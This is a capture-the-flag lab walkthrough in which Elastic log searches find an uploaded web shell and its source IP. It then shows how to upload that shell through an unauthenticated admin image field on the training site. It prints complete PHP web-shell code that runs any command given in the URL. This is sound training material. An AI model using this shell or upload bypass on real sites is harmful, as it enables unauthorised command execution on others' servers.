=

Day 3: Even if I wanted to go, their vulnerabilities wouldn't allow it.

Task 1 - Where was the web shell uploaded to?

^

  • Open the provided url. There would be an elastic hompage. From top left click on 3 lines and then click on Discover.

  • Update the timeframe, Oct 3, 2024 @ 00:00:00.000 ā†’ Oct 4, 2024 @ 00:00:00.000
    Now you can see there are a lot of hits (more than 400).

  • From left menu add request type by clicking on + button

    • add request type in elastic

  • There is a search bar in the top. Search for the keyword shell* and you will get all the request that contains shell word. In the result whole path of shell.php is clearly visible.

    result of shell* search in elastic

Answer šŸ‘‰ /media/images/rooms/shell.php

Task 2 - What IP address accessed the web shell?

^

  • To find the ip address which was used to access the webshell. Add another field as a column clientip.

    add clientip field as column in elastic search

  • Now you can see which ip address is used to make all of there web shell requests.

    list out clientip column in elastic search

Answer šŸ‘‰ 10.11.83.34

Task 3 - What is the contents of the flag.txt?

^

Now we have to perform some practicals

  • First add the ip into your hosts file. If you are using linux then use the command
    sudo echo "10.10.2.41 frostypines.thm" >> /etc/hosts to add .

  • Visit the http://frostypines.thm site into your browser. You will see a room booking site similar like :

    frostypines.thm hompage

  • There is a /admin directory with a higher privilege and don't require any authentication. Visit the /admin directory. And click on add new room.

    frostypines.thm admin hompage

  • There is an option to upload the image of room. Instead on uploading a real image you have to upload the shell.php web shell file. And remember the room number.

    frostypines.thm admin add rooms page

    Code of shell.php would be >>

    Code php
    <html>
<body>
<form method="GET" name="<?php echo basename($_SERVER['PHP_SELF']); ?>">
<input type="text" name="command" autofocus id="command" size="50">
<input type="submit" value="Execute">
</form>
<pre>
<?php
    if(isset($_GET['command'])) 
    {
        system($_GET['command'] . ' 2>&1'); 
    }
?>
</pre>
</body>
</html>

  • Now go Back to the website then click on rooms from topbar. And find the room number that you created. In my case it was the last room.

    new created room frostypines.thm

  • Right click on the image and open it in a new tab. URL would be "http://frostypines.thm/media/images/rooms/shell.php"

    web shell of frostypines.thm

    Run the command cat flag.txt and get the flag.

    flag of frostypines.thm

Answer šŸ‘‰ THM{Gl1tch_Was_H3r3}

Task 4 - If you liked today's task, you can learn how to harness the power of advanced ELK queries.

^

No Answer Needed